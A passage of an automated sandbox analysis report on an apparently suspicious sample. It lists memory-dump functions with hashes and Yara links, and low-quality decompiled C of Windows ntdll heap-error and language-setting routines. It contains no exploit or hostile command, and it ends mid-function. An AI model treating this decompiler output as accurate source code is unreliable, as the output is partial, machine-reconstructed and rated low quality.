Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958

Memory Dump Source

Source File: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 0183967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01839694

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d094597ebe86c3ce3a473697ba8edffb458d4490b5fc1d9c4921c6036e39c918
Instruction ID: a3bd4e17f127866e00e3cdb3f0d94c761e2b01e938fbf221ecb6d45c7fc5c34d
Opcode Fuzzy Hash: d094597ebe86c3ce3a473697ba8edffb458d4490b5fc1d9c4921c6036e39c918
Instruction Fuzzy Hash: C5B09B71D064C5C6D611D7A44608717790477D0745F17C151D2024791B577CC195F5F5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 018AB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

This means that the I/O device reported an I/O error. Check your hardware., xrefs: 018AB476
The critical section is owned by thread %p., xrefs: 018AB3B9
<unknown>, xrefs: 018AB27E, 018AB2D1, 018AB350, 018AB399, 018AB417, 018AB48E
*** enter .exr %p for the exception record, xrefs: 018AB4F1
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 018AB484
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 018AB305
This failed because of error %Ix., xrefs: 018AB446
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 018AB314
*** A stack buffer overrun occurred in %ws:%s, xrefs: 018AB2F3
The resource is owned shared by %d threads, xrefs: 018AB37E
*** enter .cxr %p for the context, xrefs: 018AB50D
The instruction at %p referenced memory at %p., xrefs: 018AB432
*** Resource timeout (%p) in %ws:%s, xrefs: 018AB352
read from, xrefs: 018AB4AD, 018AB4B2
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 018AB53F
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 018AB2DC
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 018AB38F
*** then kb to get the faulting stack, xrefs: 018AB51C
*** Inpage error in %ws:%s, xrefs: 018AB418
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 018AB47D
Go determine why that thread has not released the critical section., xrefs: 018AB3C5
a NULL pointer, xrefs: 018AB4E0
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 018AB39B
The instruction at %p tried to %s , xrefs: 018AB4B6
The resource is owned exclusively by thread %p, xrefs: 018AB374
write to, xrefs: 018AB4A6
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 018AB3D6
*** An Access Violation occurred in %ws:%s, xrefs: 018AB48F
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 018AB323
an invalid address, %p, xrefs: 018AB4CF

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 138a49a850cdc9790532bda0330f5b490b0f068c2c228b15d7bb91755145e85d
Instruction ID: 9390c760d66f161fc1a471df0cb652b1c586bc1f8a8c0c466b555bd393a2f28c
Opcode Fuzzy Hash: 138a49a850cdc9790532bda0330f5b490b0f068c2c228b15d7bb91755145e85d
Instruction Fuzzy Hash: A58105B5A00200FFEB31BA4ACC99D7B7FE6AF5AB55F804048F5059B112E3618651C772

Uniqueness

Uniqueness Score: -1.00%

Function 018B1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E018B1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x17d48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017FB150();
				} else {
					E017FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x18e589c);
				E017FB150("Heap error detected at %p (heap handle %p)\n",  *0x18e58a0);
				_t27 =  *0x18e5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M018B1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017FB150();
				} else {
					E017FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E017FB150("Error code: %d - %s\n",  *0x18e5898);
				_t113 =  *0x18e58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017FB150();
					} else {
						E017FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017FB150("Parameter1: %p\n",  *0x18e58a4);
				}
				_t115 =  *0x18e58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017FB150();
					} else {
						E017FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017FB150("Parameter2: %p\n",  *0x18e58a8);
				}
				_t117 =  *0x18e58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017FB150();
					} else {
						E017FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017FB150("Parameter3: %p\n",  *0x18e58ac);
				}
				_t119 =  *0x18e58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017FB150();
					} else {
						E017FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x18e58b4);
					E017FB150("Last known valid blocks: before - %p, after - %p\n",  *0x18e58b0);
				} else {
					_t120 =  *0x18e58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017FB150();
				} else {
					E017FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E017FB150("Stack trace available at %p\n", 0x18e58c0);
			}

0x018b1c10
0x018b1c16
0x018b1c1e
0x018b1c3d
0x018b1c3e
0x018b1c20
0x018b1c35
0x018b1c3a
0x018b1c44
0x018b1c55
0x018b1c5a
0x018b1c65
0x018b1c67
0x00000000
0x018b1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x018b1c67
0x018b1cdc
0x018b1ce5
0x018b1d04
0x018b1d05
0x018b1ce7
0x018b1cfc
0x018b1d01
0x018b1d0b
0x018b1d17
0x018b1d1f
0x018b1d25
0x018b1d30
0x018b1d4f
0x018b1d50
0x018b1d32
0x018b1d47
0x018b1d4c
0x018b1d61
0x018b1d67
0x018b1d68
0x018b1d6e
0x018b1d79
0x018b1d98
0x018b1d99
0x018b1d7b
0x018b1d90
0x018b1d95
0x018b1daa
0x018b1db0
0x018b1db1
0x018b1db7
0x018b1dc2
0x018b1de1
0x018b1de2
0x018b1dc4
0x018b1dd9
0x018b1dde
0x018b1df3
0x018b1df9
0x018b1dfa
0x018b1e00
0x018b1e0a
0x018b1e13
0x018b1e32
0x018b1e33
0x018b1e15
0x018b1e2a
0x018b1e2f
0x018b1e39
0x018b1e4a
0x018b1e02
0x018b1e02
0x018b1e08
0x00000000
0x00000000
0x018b1e08
0x018b1e5b
0x018b1e7a
0x018b1e7b
0x018b1e5d
0x018b1e72
0x018b1e77
0x018b1e95

Strings

Error code: %d - %s, xrefs: 018B1D12
HEAP[%wZ]: , xrefs: 018B1C30, 018B1CF7, 018B1D42, 018B1D8B, 018B1DD4, 018B1E25, 018B1E6D
Last known valid blocks: before - %p, after - %p, xrefs: 018B1E45
heap_failure_cross_heap_operation, xrefs: 018B1CC2
heap_failure_lfh_bitmap_mismatch, xrefs: 018B1CD7
heap_failure_unknown, xrefs: 018B1C75
heap_failure_listentry_corruption, xrefs: 018B1CD0
heap_failure_buffer_underrun, xrefs: 018B1C9F
heap_failure_internal, xrefs: 018B1C6E
heap_failure_invalid_argument, xrefs: 018B1CAD
heap_failure_virtual_block_corruption, xrefs: 018B1C91
heap_failure_usage_after_free, xrefs: 018B1CBB
heap_failure_multiple_entries_corruption, xrefs: 018B1C8A
Parameter3: %p, xrefs: 018B1DEE
Stack trace available at %p, xrefs: 018B1E86
heap_failure_buffer_overrun, xrefs: 018B1C98
Parameter1: %p, xrefs: 018B1D5C
heap_failure_invalid_allocation_type, xrefs: 018B1CB4
heap_failure_block_not_busy, xrefs: 018B1CA6
heap_failure_freelists_corruption, xrefs: 018B1CC9
Parameter2: %p, xrefs: 018B1DA5
HEAP: , xrefs: 018B1C16, 018B1C3D, 018B1D04, 018B1D4F, 018B1D98, 018B1DE1, 018B1E32, 018B1E7A
heap_failure_entry_corruption, xrefs: 018B1C83
Heap error detected at %p (heap handle %p), xrefs: 018B1C50
heap_failure_generic, xrefs: 018B1C7C

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 0916728c204f75023fd8d05e556ddcea2a5fe16044374e0b1c0da8dd572eec96
Instruction ID: 2a9e4895f7570b147a29ae406eb220afce4c2d821d82ed69714e07261bd0ff8c
Opcode Fuzzy Hash: 0916728c204f75023fd8d05e556ddcea2a5fe16044374e0b1c0da8dd572eec96
Instruction Fuzzy Hash: 5161D536515159DFD231AB89E4FDD66F3E4EB08B24B09847EF9099F306DB349A408F0A

Uniqueness

Uniqueness Score: -1.00%

Function 01803D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01803D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01801B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01801B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01801B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01801B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01801B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01814620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0183F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01841370(_t276, 0x17d4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0183BB40(0,  &_v68, _t170);
									if(L018043C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0183BB40(_t257,  &_v68, _t243);
								if(L018043C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01841370(_t278, 0x17d4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01814620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0183F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01841370(_v16, 0x17d4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0183BB40(_t262,  &_v68, _t244);
								if(L018043C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01841370(_t282, 0x17d4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0183BB40(_t262,  &_v68, _t201);
							if(L018043C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01814620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0183F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01841370(_t280, 0x17d4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0183BB40(_t267,  &_v68, _t245);
							if(L018043C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01841370(_t284, 0x17d4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0183BB40(_t267,  &_v68, _t224);
						if(L018043C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01803d3c
0x01803d42
0x01803d44
0x01803d46
0x01803d49
0x01803d4c
0x01803d4f
0x01803d52
0x01803d55
0x01803d58
0x01803d5b
0x01803d5f
0x01803d61
0x01803d66
0x01858213
0x01858218
0x01804085
0x01804088
0x0180408e
0x01804094
0x0180409a
0x018040a0
0x018040a6
0x018040a9
0x018040af
0x018040b6
0x018040bd
0x018040bd
0x01803d83
0x0185821f
0x01858229
0x01858238
0x01858238
0x0185823d
0x0185823d
0x01803da0
0x01803daf
0x01803db5
0x01803dba
0x01803dba
0x01803dd4
0x01803e94
0x01803eab
0x01803f6d
0x01803f84
0x0180406b
0x0180406b
0x0180406e
0x0180406e
0x01804070
0x01804074
0x01858351
0x01858351
0x0180407a
0x0180407f
0x0185835d
0x01858370
0x01858377
0x01858379
0x0185837c
0x0185837c
0x0185835d
0x00000000
0x0180407f
0x01803f8a
0x01803f8d
0x01803f90
0x01803f95
0x0185830d
0x0185830f
0x01803f9b
0x01803fac
0x01803fae
0x01803fb1
0x01803fb1
0x01803fb6
0x01858317
0x0185831a
0x00000000
0x01803fbc
0x01803fc1
0x01803fc9
0x01803fd7
0x01803fda
0x01803fdd
0x01804021
0x01804021
0x01804029
0x01804030
0x01804044
0x01804046
0x01804046
0x01804044
0x01804049
0x01858327
0x01858334
0x01858339
0x0185833c
0x0180404f
0x0180404f
0x0180404f
0x01804051
0x01804056
0x01804063
0x01804063
0x01804068
0x00000000
0x01804068
0x01803fdf
0x01803fe2
0x01803fe4
0x01803fe7
0x01803fef
0x01804003
0x01804005
0x01804005
0x0180400c
0x01804013
0x01804016
0x01804017
0x0180401b
0x0180401e
0x00000000
0x0180401e
0x01803fb6
0x01803eb1
0x01803eb4
0x01803eb7
0x01803ebc
0x018582a9
0x018582ab
0x01803ec2
0x01803ed3
0x01803ed5
0x01803ed8
0x01803ed8
0x01803edd
0x018582b3
0x018582b6
0x00000000
0x01803ee3
0x01803ee8
0x01803eed
0x01803ef0
0x01803ef3
0x01803f02
0x01803f05
0x01803f08
0x018582c0
0x018582c3
0x018582c5
0x018582c8
0x018582d0
0x018582e4
0x018582e6
0x018582e6
0x018582ed
0x018582f4
0x018582f7
0x018582f8
0x018582fc
0x018582ff
0x018582ff
0x01803f0e
0x01803f11
0x01803f16
0x01803f1d
0x01803f31
0x01858307
0x01858307
0x01803f31
0x01803f39
0x01803f48
0x01803f4d
0x01803f50
0x01803f50
0x01803f53
0x01803f58
0x01803f65
0x01803f65
0x01803f6a
0x00000000
0x01803f6a
0x01803edd
0x01803dda
0x01803ddd
0x01803de0
0x01803de5
0x01858245
0x01803deb
0x01803df7
0x01803dfc
0x01803dfe
0x01803e01
0x01803e01
0x01803e06
0x0185824d
0x0185824f
0x01858254
0x00000000
0x01803e0c
0x01803e11
0x01803e16
0x01803e19
0x01803e29
0x01803e2c
0x01803e2f
0x0185825c
0x0185825f
0x01858261
0x01858264
0x0185826c
0x01858280
0x01858282
0x01858282
0x01858289
0x01858290
0x01858293
0x01858294
0x01858298
0x0185829b
0x0185829b
0x01803e35
0x01803e38
0x01803e3d
0x01803e44
0x01803e58
0x018582a3
0x018582a3
0x01803e58
0x01803e60
0x01803e6f
0x01803e74
0x01803e77
0x01803e77
0x01803e7a
0x01803e7f
0x01803e8c
0x01803e8c
0x01803e91
0x00000000
0x01803e91

Strings

WindowsExcludedProcs, xrefs: 01803D6F
Kernel-MUI-Language-Allowed, xrefs: 01803DC0
Kernel-MUI-Language-Disallowed, xrefs: 01803E97
Kernel-MUI-Language-SKU, xrefs: 01803F70
Kernel-MUI-Number-Allowed, xrefs: 01803D8C

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 3b0ba341ab1bb6851987b5e2c849f1d2b62fe26454e3ef1b8920ba50e7eb04fd
Instruction ID: def02e194421c254158b474ec75fb735196f86c965c7e43a6aca7096006c5b16
Opcode Fuzzy Hash: 3b0ba341ab1bb6851987b5e2c849f1d2b62fe26454e3ef1b8920ba50e7eb04fd
Instruction Fuzzy Hash: 80F12872D0061DEFCB52DF99C980AEEBBB9FF58750F15006AE905E7650D7349A00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 017FE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E017FE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E017FF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E018395D0();
						}
						if(_t78 != 0) {
							L018177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0183FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0183BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01839600();
					if(_t97 < 0) {
						goto L6;
					}
					E0183BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L017FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0183BB40(_t83, _t102 + 0x24, _t78);
								if(L018043C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0183BB40(_t84, _t102 + 0x24, _t94);
									if(L018043C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
